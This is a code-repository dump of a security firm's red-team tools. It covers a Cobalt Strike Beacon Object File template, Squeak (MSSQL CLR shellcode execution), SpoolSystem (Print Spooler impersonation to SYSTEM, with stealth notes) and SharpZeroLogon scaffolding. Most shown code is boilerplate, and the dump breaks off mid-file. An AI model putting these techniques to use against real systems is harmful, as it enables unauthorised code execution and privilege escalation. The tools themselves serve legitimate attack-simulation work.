├── Tools
├── bof-vs-template
│ ├── cna
│ │ ├── bin
│ │ │ └── README.md
│ │ └── hello.cna
│ ├── bof
│ │ ├── bof.c
│ │ ├── bof.vcxproj.filters
│ │ ├── beacon.h
│ │ └── bof.vcxproj
│ ├── README.md
│ ├── bof.sln
│ ├── .gitattributes
│ └── .gitignore
├── Squeak
│ ├── blacksquare.ico
│ ├── packages.config
│ ├── App.config
│ ├── Properties
│ │ ├── Settings.settings
│ │ ├── Settings.Designer.cs
│ │ ├── AssemblyInfo.cs
│ │ ├── Resources.Designer.cs
│ │ └── Resources.resx
│ ├── App.xaml
│ ├── App.xaml.cs
│ ├── MainWindow.xaml
│ ├── MainWindow.xaml.cs
│ ├── README.md
│ ├── Squeak.sln
│ ├── Code.xaml
│ ├── Code.xaml.cs
│ ├── Home.xaml
│ ├── clrcode.cs
│ ├── Squeak.csproj
│ ├── .gitignore
│ └── Home.xaml.cs
├── oab-parse
│ ├── mspack.x64.dll
│ ├── mspack.x86.dll
│ ├── requirements.txt
│ └── README.md
├── spoolsystem
│ ├── spoolsystem.gif
│ ├── cna
│ │ ├── bin
│ │ │ ├── SpoolTrigger.x64.dll
│ │ │ └── SpoolTrigger.x86.dll
│ │ └── spoolsystem.cna
│ ├── Readme.md
│ ├── SpoolTrigger.sln
│ ├── SpoolTrigger
│ │ ├── SpoolTrigger.vcxproj.filters
│ │ ├── patch.h
│ │ ├── ReflectiveDllInjection.h
│ │ ├── ms-rprn.idl
│ │ ├── dllmain.cpp
│ │ ├── ReflectiveLoader.h
│ │ └── ms-rprn_h.h
│ ├── .gitattributes
│ └── .gitignore
├── README.md
├── Sigwhatever
│ ├── FodyWeavers.xml
│ ├── App.config
│ ├── packages.config
│ ├── Sigwhatever.sln
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ ├── Licences
│ │ ├── Seatbelt.txt
│ │ └── Inveigh.txt
│ ├── clsLDAP.cs
│ ├── .gitattributes
│ ├── HTTPCap.cs
│ ├── README.md
│ ├── Crypto.cs
│ ├── Sigwhatever.csproj
│ ├── FodyWeavers.xsd
│ ├── .gitignore
│ ├── clsOutlook.cs
│ └── NTLM.cs
├── SharpZeroLogon
│ ├── SharpZeroLogon
│ │ ├── Kernel32.cs
│ │ ├── Properties
│ │ │ └── AssemblyInfo.cs
│ │ ├── SharpZeroLogon.csproj
│ │ ├── Netapi32.cs
│ │ └── Program.cs
│ ├── SharpZeroLogon.sln
│ └── README.md
└── .gitignore
└── README.md
/Tools/bof-vs-template/cna/bin/README.md:
--------------------------------------------------------------------------------
1 | Here you will find the `bof.x86.o` and `bof.x64.o` files :)
2 |
--------------------------------------------------------------------------------
/Tools/Squeak/blacksquare.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nccgroup/nccfsas/HEAD/Tools/Squeak/blacksquare.ico
--------------------------------------------------------------------------------
/Tools/oab-parse/mspack.x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nccgroup/nccfsas/HEAD/Tools/oab-parse/mspack.x64.dll
--------------------------------------------------------------------------------
/Tools/oab-parse/mspack.x86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nccgroup/nccfsas/HEAD/Tools/oab-parse/mspack.x86.dll
--------------------------------------------------------------------------------
/Tools/oab-parse/requirements.txt:
--------------------------------------------------------------------------------
1 | numpy == 1.22.0
2 | bitstream == 2.6.0.1
3 | click == 8.0.3
4 | tabulate == 0.8.9
--------------------------------------------------------------------------------
/Tools/spoolsystem/spoolsystem.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nccgroup/nccfsas/HEAD/Tools/spoolsystem/spoolsystem.gif
--------------------------------------------------------------------------------
/Tools/README.md:
--------------------------------------------------------------------------------
1 | # Tools
2 |
3 | This repository contains tools that have been released publicly by NCC Group FSAS team.
4 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/cna/bin/SpoolTrigger.x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nccgroup/nccfsas/HEAD/Tools/spoolsystem/cna/bin/SpoolTrigger.x64.dll
--------------------------------------------------------------------------------
/Tools/spoolsystem/cna/bin/SpoolTrigger.x86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nccgroup/nccfsas/HEAD/Tools/spoolsystem/cna/bin/SpoolTrigger.x86.dll
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Introduction
2 |
3 | This repository holds information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team.
4 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/Tools/Squeak/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Tools/Squeak/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Tools/Squeak/Properties/Settings.settings:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Tools/Squeak/App.xaml:
--------------------------------------------------------------------------------
1 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/Tools/Squeak/App.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Configuration;
4 | using System.Data;
5 | using System.Linq;
6 | using System.Threading.Tasks;
7 | using System.Windows;
8 |
9 | namespace Squeak
10 | {
11 | ///
12 | /// Interaction logic for App.xaml
13 | ///
14 | public partial class App : Application
15 | {
16 | }
17 | }
18 |
--------------------------------------------------------------------------------
/Tools/bof-vs-template/bof/bof.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include "beacon.h"
5 |
6 | void demo(char* args, int length) {
7 | datap parser;
8 | char* str_arg;
9 | int num_arg;
10 |
11 | BeaconDataParse(&parser, args, length);
12 | str_arg = BeaconDataExtract(&parser, NULL);
13 | num_arg = BeaconDataInt(&parser);
14 |
15 | BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_arg);
16 | }
--------------------------------------------------------------------------------
/Tools/bof-vs-template/cna/hello.cna:
--------------------------------------------------------------------------------
1 | alias hello {
2 | local('$barch $handle $data $args');
3 |
4 | # figure out the arch of this session
5 | $barch = barch($1);
6 |
7 | # read in the right BOF file
8 | $handle = openf(script_resource("bin/bof. $+ $barch $+ .o"));
9 | $data = readb($handle, -1);
10 | closef($handle);
11 |
12 | # pack our arguments
13 | $args = bof_pack($1, "zi", "Hello World", 1234);
14 |
15 | # announce what we're doing
16 | btask($1, "Running Hello BOF");
17 |
18 | # execute it.
19 | beacon_inline_execute($1, $data, "demo", $args);
20 | }
--------------------------------------------------------------------------------
/Tools/Squeak/MainWindow.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/Tools/Squeak/MainWindow.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using System.Windows;
7 | using System.Windows.Controls;
8 | using System.Windows.Data;
9 | using System.Windows.Documents;
10 | using System.Windows.Input;
11 | using System.Windows.Media;
12 | using System.Windows.Media.Imaging;
13 | using System.Windows.Navigation;
14 | using System.Windows.Shapes;
15 |
16 | namespace Squeak
17 | {
18 | ///
19 | /// Interaction logic for MainWindow.xaml
20 | ///
21 | public partial class MainWindow : NavigationWindow
22 | {
23 | public MainWindow()
24 | {
25 | InitializeComponent();
26 | }
27 | }
28 | }
29 |
--------------------------------------------------------------------------------
/Tools/Squeak/README.md:
--------------------------------------------------------------------------------
1 | # Squeak
2 |
3 | Connect to an MSSQL instance (as DBA/SA) and execute shellcode via a .net DLL.
4 |
5 | Generate a standalone .net executable with hard coded arguments to leverage SQL CLR integration.
6 |
7 | 1. Open the Squeak GUI
8 | 2. Populate the connection details and supply a raw shellcode file
9 | 3. Generate the executable and run it
10 |
11 | **Code for the CLR is taken from the clrcode.cs file which must reside in the working directory of the Squeak.exe binary**. Copy clrcode.cs to the working directory of Squeak.exe before running. Modifications to the code, for example to change the spawned binary, can be carried out within the Squeak GUI or by directly editing the clrcode.cs file. The file uses the string [RAW] as a placeholder for the shellcode.
12 |
--------------------------------------------------------------------------------
/Tools/bof-vs-template/bof/bof.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 |
--------------------------------------------------------------------------------
/Tools/Squeak/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace Squeak.Properties {
12 |
13 |
14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "16.7.0.0")]
16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
17 |
18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
19 |
20 | public static Settings Default {
21 | get {
22 | return defaultInstance;
23 | }
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/Tools/Squeak/Squeak.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30413.136
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Squeak", "Squeak.csproj", "{B36CA995-B475-427F-B209-4E7F0835023D}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {B36CA995-B475-427F-B209-4E7F0835023D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {B36CA995-B475-427F-B209-4E7F0835023D}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {B36CA995-B475-427F-B209-4E7F0835023D}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {B36CA995-B475-427F-B209-4E7F0835023D}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {C3C8B6DE-7283-4C69-A858-FC0CAA4557B4}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/Sigwhatever.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30413.136
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sigwhatever", "Sigwhatever.csproj", "{311F097D-17BF-418F-BEE7-BE15C1C93FF7}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {311F097D-17BF-418F-BEE7-BE15C1C93FF7}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {311F097D-17BF-418F-BEE7-BE15C1C93FF7}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {311F097D-17BF-418F-BEE7-BE15C1C93FF7}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {311F097D-17BF-418F-BEE7-BE15C1C93FF7}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {E031305F-6E82-4745-A3E6-32E3FDB65401}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Tools/SharpZeroLogon/SharpZeroLogon/Kernel32.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SharpZeroLogon
5 | {
6 | internal class Kernel32
7 | {
8 | [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Unicode)]
9 | internal static extern IntPtr LoadLibrary(string lpFileName);
10 |
11 | [DllImport("kernel32.dll", SetLastError = true)]
12 | internal static extern bool VirtualProtect(
13 | IntPtr lpAddress,
14 | uint dwSize,
15 | uint flNewProtect,
16 | out uint lpflOldProtect
17 | );
18 |
19 | [DllImport("kernel32.dll")]
20 | internal static extern bool ReadProcessMemory(IntPtr hProcess, long lpBaseAddress, byte[] lpBuffer, uint dwSize, ref int lpNumberOfBytesRead);
21 |
22 | internal struct MODULEINFO
23 | {
24 | internal IntPtr lpBaseOfDll;
25 | internal uint SizeOfImage;
26 | internal IntPtr EntryPoint;
27 | }
28 |
29 | [DllImport("psapi.dll", SetLastError = true)]
30 | internal static extern bool GetModuleInformation(IntPtr hProcess, IntPtr hModule, out MODULEINFO lpmodinfo, uint cb);
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/Tools/SharpZeroLogon/SharpZeroLogon.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29709.97
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpZeroLogon", "SharpZeroLogon\SharpZeroLogon.csproj", "{15CE9A3C-4609-4184-87B2-E29FC5E2B770}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {15CE9A3C-4609-4184-87B2-E29FC5E2B770}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {15CE9A3C-4609-4184-87B2-E29FC5E2B770}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {15CE9A3C-4609-4184-87B2-E29FC5E2B770}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {15CE9A3C-4609-4184-87B2-E29FC5E2B770}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {79F38300-555A-4869-B9B8-553F52CC9595}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/Readme.md:
--------------------------------------------------------------------------------
1 | # SpoolSystem
2 |
3 | SpoolSystem is a CNA script for Cobalt Strike which uses the Print Spooler named pipe impersonation trick to gain SYSTEM privileges.
4 |
5 | It uses internal Cobalt Strike APIs not usually exposed to aggressor scripting to achieve seamless execution as SYSTEM without creating any new process or relying on shellcode injection.
6 |
7 | ## Running
8 |
9 | The script supports two modes:
10 |
11 | * inject: this is the one you probably want to use. It triggers the spoolss RPC method via self-injection within the current process. This is the best option for OPSEC, but ideally should be done in a process you don't mind crashing (just incase).
12 | * spawn: this uses `bdllspawn` to trigger the spoolss RPC method, so launches another process (not as good for OPSEC)
13 |
14 | Both modes allow a user with only `SeImpersonatePrivilege` to gain SYSTEM privileges within the current beacon session. This is useful if you have a privilege escalation that gives you `LOCAL SERVICE`, `NETWORK SERVICE` or similar. However it can also be used as a straight replacement for `getsystem`, which is much stealthier than the builtin CS method.
15 |
16 | ## Example
17 |
18 |
19 | 
20 |
21 | ## References
22 |
23 | * https://github.com/itm4n/PrintSpoofer
--------------------------------------------------------------------------------
/Tools/Squeak/Code.xaml:
--------------------------------------------------------------------------------
1 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 | Code for CLR DLL - the [RAW] placeholder will be replaced with XORed shellcode
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
--------------------------------------------------------------------------------
/Tools/bof-vs-template/README.md:
--------------------------------------------------------------------------------
1 | # bof
2 |
3 | This is a template project for building Cobalt Strike BOFs in Visual Studio.
4 |
5 | If you prefer not to use the command line `cl.exe` or `mingw32` and are used to working with an IDE, this project should help with that.
6 |
7 | ## Using it
8 |
9 | Just clone this repo and you can start writing code in `bof.c`, using the APIs detailed in [this Cobalt Strike post.](https://www.cobaltstrike.com/help-beacon-object-files)
10 |
11 | If you change the default `demo` function name, then you will also need to change the entrypoint in the `cna\hello.cna` file.
12 |
13 | ## Building
14 |
15 | The project settings are setup to compile a `.lib` file without linking it. There is then a post-build job that copies the `.obj` files into the `cna\bin\` folder as `bof.x64.o` and `bof.x86.o` respectively.
16 |
17 | Once you have built the `.o` files, you just need to modify the `hello.cna` to pack your arguments correctly and modify the entrypoint and alias and you are all set!
18 |
19 | ## Testing it out
20 |
21 | If you just want to give BOFs a try, first build the project in release mode for both x86 and x64, then copy the `cna\` folder and load the `hello.cna` file in Cobalt Strike. In a beacon session type `hello`.
22 |
23 | This is the default example from the Cobalt Strike blog.
24 |
25 | You should see the following output printed if successful:
26 |
27 | ```
28 | [+] received output:
29 | Message is Hello World with 1234 arg
30 | ```
--------------------------------------------------------------------------------
/Tools/bof-vs-template/bof.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29709.97
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "bof", "bof\bof.vcxproj", "{48E12421-9D4E-459F-8603-7D9E6A12CB39}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Debug|x64.ActiveCfg = Debug|x64
17 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Debug|x64.Build.0 = Debug|x64
18 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Debug|x86.ActiveCfg = Debug|Win32
19 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Debug|x86.Build.0 = Debug|Win32
20 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Release|x64.ActiveCfg = Release|x64
21 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Release|x64.Build.0 = Release|x64
22 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Release|x86.ActiveCfg = Release|Win32
23 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {8874FEBC-DCD1-4750-B05F-90CCD5F0292E}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29709.97
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SpoolTrigger", "SpoolTrigger\SpoolTrigger.vcxproj", "{80A14EC7-7999-4828-8C48-13CDA7853E29}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Debug|x64.ActiveCfg = Debug|x64
17 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Debug|x64.Build.0 = Debug|x64
18 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Debug|x86.ActiveCfg = Debug|Win32
19 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Debug|x86.Build.0 = Debug|Win32
20 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Release|x64.ActiveCfg = Release|x64
21 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Release|x64.Build.0 = Release|x64
22 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Release|x86.ActiveCfg = Release|Win32
23 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {8623D52A-9314-4C3F-9B7D-538D9B813931}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Sigwhatever")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Sigwhatever")]
13 | [assembly: AssemblyCopyright("Copyright © 2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("311f097d-17bf-418f-bee7-be15c1c93ff7")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Tools/SharpZeroLogon/SharpZeroLogon/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("SharpZeroLogon")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SharpZeroLogon")]
13 | [assembly: AssemblyCopyright("Copyright © 2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("15ce9a3c-4609-4184-87b2-e29fc5e2b770")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/Licences/Seatbelt.txt:
--------------------------------------------------------------------------------
1 | Rubeus is provided under the 3-clause BSD license below.
2 |
3 | *************************************************************
4 |
5 | Copyright (c) 2020, Will Schroeder and Lee Christensen
6 | All rights reserved.
7 |
8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
9 |
10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
13 |
14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
15 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/Licences/Inveigh.txt:
--------------------------------------------------------------------------------
1 | BSD 3-Clause License
2 |
3 | Copyright (c) 2020, Kevin Robertson
4 | All rights reserved.
5 |
6 | Redistribution and use in source and binary forms, with or without
7 | modification, are permitted provided that the following conditions are met:
8 |
9 | * Redistributions of source code must retain the above copyright notice, this
10 | list of conditions and the following disclaimer.
11 |
12 | * Redistributions in binary form must reproduce the above copyright notice,
13 | this list of conditions and the following disclaimer in the documentation
14 | and/or other materials provided with the distribution.
15 |
16 | * Neither the name of the copyright holder nor the names of its
17 | contributors may be used to endorse or promote products derived from
18 | this software without specific prior written permission.
19 |
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 |
--------------------------------------------------------------------------------
/Tools/Squeak/Code.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using System.Windows;
7 | using System.Windows.Controls;
8 | using System.Windows.Data;
9 | using System.Windows.Documents;
10 | using System.Windows.Input;
11 | using System.Windows.Media;
12 | using System.Windows.Media.Imaging;
13 | using System.Windows.Navigation;
14 | using System.Windows.Shapes;
15 | using System.IO;
16 |
17 | namespace Squeak
18 | {
19 | ///
20 | /// Interaction logic for Code.xaml
